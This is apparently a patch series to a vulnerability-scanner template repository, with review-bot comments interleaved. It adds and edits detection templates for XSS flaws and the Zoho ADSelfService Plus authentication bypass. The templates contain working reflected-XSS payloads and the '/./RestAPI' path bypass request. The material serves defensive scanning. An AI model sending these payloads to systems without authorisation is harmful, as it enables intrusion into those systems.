cves/2016/CVE-2016-8527.yaml diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml new file mode 100644 index 0000000000..2e88470258 --- /dev/null +++ b/cves/2016/CVE-2016-8527.yaml 
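Review bot: Detection rests on the single word `PHP-Proxy` appearing anywhere in the body of `/` or `/proxy`, which any page that merely mentions the project (a blog post, a footer link) satisfies, so this `tech` finding will carry false positives; anchoring on markup the application itself emits would tighten it, and the extractor regex `PHP\-Proxy<\/a> ([0-9.]+)<\/div>` added to this template later in the series is exactly such an anchor and could double as the matcher. With two `path:` entries and no `stop-at-first-match: true`, a real PHP-Proxy install is also reported twice; the gitea and elfinder templates in the same batch set that flag and this one should match them.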
@@ -0,0 +1,33 @@ +id: CVE-2016-8527 + +info: + name: Aruba Airwave - (XSS) + author: pikpikcu + severity: medium + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + reference: + - https://www.exploit-db.com/exploits/41482 + - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + tags: cves,cve2016,aruba,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 3e2c882d84a8f90417fc55379f6c16bcafb1b6cd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:07:34 +0700 Subject: [PATCH 311/339] Create CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-40539.yaml diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml new file mode 100644 index 0000000000..2c5dbfd0b1 --- /dev/null +++ b/cves/2021/CVE-2021-40539.yaml 
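Review bot: The header matcher `'Content-Type: text/html'` under `matchers-condition: and` contradicts the request itself: the payload is an XHTML-namespace trick (`<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload=…/>`) aimed at `group_list.xml`, which only makes sense if the endpoint answers as XML, so a vulnerable AirWave returning `text/xml` or `application/xml` fails this matcher and is never reported. Either drop the content-type check or match the XML type the referenced PoC shows. The body word is rendered here as `""`; whatever the committed value is, it should be a substring of what the request actually sends (the `a:body onload` fragment), otherwise the reflected payload can never satisfy it.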
@@ -0,0 +1,33 @@ +id: CVE-2021-40539 + +info: + name: Zoho ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + author: daffainfo + severity: critical + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. + tags: cve,cve2021,rce,zoho + reference: + - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + +requests: + + - raw: + - | + POST /RestAPI/LogonCustomization HTTP/1.1 + Host: 172.16.57.9 + Content-Type: application/x-www-form-urlencoded + Content-Length: 27 + + methodToCall=previewMobLogo + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 From cd4eff06ecb637615a8cd08e21b249acb48137cc Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:18:34 +0700 Subject: [PATCH 312/339] Create gitea-detect.yaml --- technologies/gitea-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/gitea-detect.yaml diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml new file mode 100644 index 0000000000..e17960b43a --- /dev/null +++ b/technologies/gitea-detect.yaml @@ -0,0 +1,25 @@ +id: gitea-detect + +info: + name: Gitea Detect + author: pikpikcu + severity: info + tags: tech,gitea + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/user/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by Gitea" + + - type: status + status: + - 200 From 57bdb750542a5c3bb991dd010f6e0f128ab6a49c Mon Sep 17 00:00:00 2001 
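Review bot: `Host: 172.16.57.9` is a hard-coded lab address; in a raw request the header must be `Host: {{Hostname}}`, otherwise every target is asked for a virtual host it does not serve and the template is unusable outside the author's environment. `Content-Length: 27` is correct for `methodToCall=previewMobLogo` today, but a fixed length in a raw request silently breaks the moment the body is edited; if the engine computes it when the header is omitted, dropping the line is safer. The body word shown as `''` should be checked in the committed file — an empty word matcher plus `status: 200` would flag any host that serves the path, which for a `critical` template is a costly false positive.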
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:34:31 +0700 Subject: [PATCH 313/339] Create elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/elfinder-detect.yaml diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml new file mode 100644 index 0000000000..53e207dae4 --- /dev/null +++ b/technologies/elfinder-detect.yaml @@ -0,0 +1,26 @@ +id: elfinder-detect + +info: + name: elFinder Detect + author: pikpikcu + severity: info + tags: tech,elfinder + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/php/connector.minimal.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - '{"error":["errUnknownCmd"]}' + + - type: status + status: + - 200 From da9e13223267f1591a6532a6f7e6cf5e230c1966 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:10:20 +0700 Subject: [PATCH 314/339] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 2c5dbfd0b1..99127daa41 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -15,7 +15,7 @@ requests: - raw: - | POST /RestAPI/LogonCustomization HTTP/1.1 - Host: 172.16.57.9 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From 58697d30dc76d09962b92d048df1a4996e54af34 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 16 Sep 2021 15:09:33 +0530 Subject: [PATCH 315/339] Update azure-takeover-detection.yaml --- dns/azure-takeover-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 67bee6345b..c3191cdd0a 100644 --- a/dns/azure-takeover-detection.yaml 
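Review bot: The first `words:` entry appears as `""` in this rendering; if the committed value is genuinely empty it matches every body, and since no `condition:` is set the entries are alternatives, so `'{"error":["errUnknownCmd"]}'` adds nothing and any site answering 200 on `/` is reported as elFinder — please confirm the value survived. The second path drives the file-manager connector (`php/connector.minimal.php`) directly, which for a `severity: info` tech-detect is more intrusive than needed, and without `stop-at-first-match: true` both requests go out and a positive host is reported twice.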
+++ b/dns/azure-takeover-detection.yaml @@ -44,6 +44,7 @@ dns: - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From 279d0234ac80169eaa3e00a1163a6bedb55a1d24 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:27:49 +0530 Subject: [PATCH 316/339] Update dir-listing.yaml --- miscellaneous/dir-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index 15c5c11756..18562b5341 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml @@ -4,6 +4,7 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info + reference: https://portswigger.net/kb/issues/00600100_directory-listing tags: misc,generic requests: From 47433f207b0ed4f20f5d43257846515b952b8bcd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:33:13 +0530 Subject: [PATCH 317/339] Update elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml index 53e207dae4..4b2dbbccc8 100644 --- a/technologies/elfinder-detect.yaml +++ b/technologies/elfinder-detect.yaml @@ -10,8 +10,9 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/php/connector.minimal.php" + - "{{BaseURL}}/elfinder.html" + stop-at-first-match: true matchers-condition: and matchers: @@ -19,7 +20,6 @@ requests: part: body words: - "" - - '{"error":["errUnknownCmd"]}' - type: status status: From 47b99dc20d9df165521996858b482afd17a8f8bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:43:04 +0530 Subject: [PATCH 318/339] Update gitea-detect.yaml --- technologies/gitea-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml index e17960b43a..965db9b3eb 100644 --- a/technologies/gitea-detect.yaml 
+++ b/technologies/gitea-detect.yaml @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/user/login" + stop-at-first-match: true matchers-condition: and matchers: @@ -23,3 +24,9 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - "Powered by Gitea Version: ([0-9.]+)" From 55d676dc77d54b41ffe21446c8769ff7fedb3dbb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:18:51 +0530 Subject: [PATCH 319/339] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 99127daa41..d90c9cb621 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -5,16 +5,16 @@ info: author: daffainfo severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. - tags: cve,cve2021,rce,zoho reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + tags: cve,cve2021,rce,zoho requests: - raw: - | - POST /RestAPI/LogonCustomization HTTP/1.1 + POST /./RestAPI/LogonCustomization HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From cd98f1dcc7e317477fd3796fd4dd5a430eb0687e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:19:49 +0530 Subject: [PATCH 320/339] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 2e88470258..828f85d642 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml 
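Review bot: The new extractor regex `Powered by Gitea Version: ([0-9.]+)` defines a capture group but the extractor has no `group: 1`, so the extracted value is the whole `Powered by Gitea Version: x.y.z` match rather than the version number; the php-proxy extractor added later in this series sets `group: 1` and this one should too. A short `# group 1 isolates the numeric version` comment next to it documents the intent.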
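Review bot: `POST /./RestAPI/LogonCustomization HTTP/1.1` introduces a `/./` segment that looks deliberate — presumably the path-normalisation quirk the referenced Rapid7 analysis describes as the authentication bypass — but nothing in the template says so, and a later tidy-up that "normalises" the path would silently turn the check into a request the auth filter blocks. A comment above the raw block, `# the /./ prefix is intentional: it is the path-normalisation bypass that skips the auth filter (see reference)`, protects it. I could not confirm the mechanism from the hunk itself, so word the comment to match what the reference states.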
@@ -4,7 +4,7 @@ info: name: Aruba Airwave - (XSS) author: pikpikcu severity: medium - description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 From d0f5daca610eea29a9171330170186838ee2c8d3 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:04:04 +0300 Subject: [PATCH 321/339] #276 Replace space character with dash in template ID. --- cves/2020/CVE-2020-6171.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index 1e99f11860..aa04aa85bd 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml @@ -1,4 +1,4 @@ -id: CVE 2020-6171 +id: CVE-2020-6171 info: name: CLink Office v2 XSS From 7542ad2c07f4fe6f47c66eb951cfa577ad193982 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:05:34 +0000 Subject: [PATCH 322/339] Auto Generated CVE annotations [Thu Sep 16 13:05:34 UTC 2021] :robot: --- cves/2020/CVE-2020-6171.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index aa04aa85bd..2e680f0de1 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml 
@@ -8,6 +8,11 @@ info: A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-6171 tags: cve,cve2020,xss,clink-office + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-6171 + cwe-id: CWE-79 requests: - method: GET From 8cee3ae73bb3b752c96a42bf329842320efc41f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:42:19 +0530 Subject: [PATCH 323/339] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 828f85d642..94470343ec 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -13,14 +13,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: status @@ -28,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From 77c3dc36ac7df4c04e3ff7cd97f5f63ec8dc7311 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:13:57 +0000 Subject: [PATCH 324/339] Auto Generated CVE annotations [Thu Sep 16 13:13:57 UTC 2021] :robot: --- cves/2021/CVE-2021-40539.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index d90c9cb621..0da6945312 100644 --- a/cves/2021/CVE-2021-40539.yaml 
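Review bot: Replacing the XHTML-namespace payload with `start=%3C%2Fscript%3E%3Cscript%3Ealert…` changes the injection context the template tests: the original `<a xmlns:a='…xhtml'><a:body onload=…/>` was presumably chosen because `group_list.xml` reflects into an XML document, where a bare `<script>` element is not interpreted as HTML script. Unless the referenced advisory also shows an HTML reflection, the rewritten request no longer demonstrates CVE-2016-8527, and the `text/html` header matcher keeps an XML response from matching in any case. Keeping the namespace payload, matching on `a:body onload`, and dropping or relaxing the content-type check is what I would propose.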
+++ b/cves/2021/CVE-2021-40539.yaml @@ -9,6 +9,11 @@ info: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 tags: cve,cve2021,rce,zoho + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40539 + cwe-id: CWE-287 requests: From d8776d389f8b59ecc261957b4acb8355bc0975aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:49:01 +0530 Subject: [PATCH 325/339] Update php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml index bd3e98a6fd..fb898af353 100644 --- a/technologies/php-proxy-detect.yaml +++ b/technologies/php-proxy-detect.yaml @@ -23,3 +23,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>' From 18ab41c89a71719a5e566966b00a46a49a0e7a23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:20:40 +0000 Subject: [PATCH 326/339] Auto Generated CVE annotations [Thu Sep 16 13:20:40 UTC 2021] :robot: --- cves/2016/CVE-2016-8527.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 94470343ec..efc62d3bd6 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 tags: cves,cve2016,aruba,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-8527 + cwe-id: CWE-79 requests: - method: GET From 4984b42e66b2c51d1ea89bffad47360d42e55910 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Thu, 16 Sep 2021 21:28:19 +0530 Subject: [PATCH 327/339] Update CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index a3c1d32ec5..e9ce1b1915 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -13,18 +13,18 @@ info: requests: - method: POST path: - - '{{BaseURL}/kindeditor/php/demo.php' + - '{{BaseURL}}/kindeditor/php/demo.php' + - '{{BaseURL}}/php/demo.php' + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded - body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" - matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 4926c9174cc397130c4ded51f416eec8220a75d9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 16 Sep 2021 21:43:58 +0530 Subject: [PATCH 328/339] misc update --- technologies/getsimple-cms-detect.yaml | 7 ++++++- technologies/getsimple-cms-detector.yaml | 22 ---------------------- 2 files changed, 6 insertions(+), 23 deletions(-) delete mode 100644 technologies/getsimple-cms-detector.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 931a074037..9f6dab6f06 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -2,15 +2,18 @@ id: getsimple-cms-detect info: name: GetSimple CMS Detection - author: pikpikcu + author: pikpikcu,philippedelteil severity: info tags: tech,getsimple + description: Template to detect a running GetSimple CMS instance requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/readme.txt" + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -20,4 +23,6 @@ requests: - type: word words: - "Powered by GetSimple" + - 'GetSimple CMS is a flatfile CMS' part: body + condition: or \ No newline at end of file 
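Review bot: With two `path:` entries, `'{{BaseURL}}/kindeditor/php/demo.php'` and `'{{BaseURL}}/php/demo.php'`, and no `stop-at-first-match: true`, both POSTs are sent to every host and a vulnerable install is reported twice; the gitea and elfinder templates in this batch add `stop-at-first-match: true` after `path:` and this one should do the same. The body word is still rendered as `''` here, so the reflected-string check is worth confirming in the committed file alongside the brace fix.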
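Review bot: The merged getsimple-cms-detect ends with `\ No newline at end of file`, which every other template in this series avoids; add the trailing newline. `description:` is placed after `tags:`, while the other templates here order `description` before `reference`/`tags`; keeping the key order consistent makes the generated annotations and diffs easier to read.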
diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml deleted file mode 100644 index 95ed07e8c1..0000000000 --- a/technologies/getsimple-cms-detector.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: getsimple-cms-detector - -info: - name: GetSimple CMS Detector - author: philippedelteil - severity: info - description: With this template we can detect a running GetSimple CMS instance - tags: getsimple,tech -requests: - - method: GET - path: - - "{{BaseURL}}/readme.txt" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'GetSimple CMS is a flatfile CMS' - - type: status - part: header - status: - - 200 From 0dd6d4a6b414a1f98f0f76a88c0268bdd2032223 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 16:58:29 +0000 Subject: [PATCH 329/339] Auto Generated CVE annotations [Thu Sep 16 16:58:29 UTC 2021] :robot: --- cves/2019/CVE-2019-13392.yaml | 5 +++++ cves/2019/CVE-2019-7543.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index fe641a6446..2bc429135d 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -9,6 +9,11 @@ info: - https://www.doyler.net/security-not-included/natemail-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 tags: cves,cve2019,natemail,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-13392 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index e9ce1b1915..4ce8628577 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml 
@@ -9,6 +9,11 @@ info: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 tags: cves,cve2019,kindeditor,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7543 + cwe-id: CWE-79 requests: - method: POST From d3c6985d3ebf87fc40c4173797c76c4040cff79c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:31:41 +0530 Subject: [PATCH 330/339] Update CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index bbdb198b8a..a90ef3066c 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -4,7 +4,7 @@ info: name: MaxSite CMS XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 @@ -13,21 +13,21 @@ info: requests: - method: GET path: - - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: 
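Review bot: The rewritten paths `/page/1%3C%2Fscript%3E…` drop both the `/hello/` segment and the `%22%3E` attribute-break of the original `1%22%3E%3Csvg/onload=…`, so the request now targets a different URL shape and assumes a text or script reflection context; if `product/page/*` echoes the segment inside an attribute (the old `%22%3E` prefix suggests it does), the `part: body` word match still passes on the inert literal and the template reports an XSS that does not fire. Keeping the payload shape from the referenced issue, or additionally asserting the break-out characters, ties the match to the real context. With two paths and no `stop-at-first-match: true`, a vulnerable host is also reported twice. The `status:` value sits past the end of the hunk.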
From c40be75a1395186198349f608063d5bf4ba5226d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:04:58 +0000 Subject: [PATCH 331/339] Auto Generated CVE annotations [Thu Sep 16 17:04:58 UTC 2021] :robot: --- cves/2021/CVE-2021-35265.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index a90ef3066c..5217c1c155 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -9,6 +9,11 @@ info: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 tags: cves,cve2021,maxsite,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-35265 + cwe-id: CWE-79 requests: - method: GET From ac93a8acaf18fa157fb1c5f8a736a4e942d9149b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:46:36 +0530 Subject: [PATCH 332/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 8d87b74364..ddd8a322ce 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-theme requests: - raw: @@ -17,21 +17,21 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - - action=tie_ajax_search&query[]= + + action=tie_ajax_search&query[]= matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 684d541115c31a1cf864ce97fcf1446e19a25723 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:27 +0530 Subject: [PATCH 333/339] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index 8d02f10378..b4f2434d35 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -8,25 +8,25 @@ info: reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 - tags: cves,cve2021,wordpress,xss + tags: cve,cve2021,wordpress,xss,wp-theme requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 14dd731ba200263ac70aa88eab3785bf88c7a6dc Mon Sep 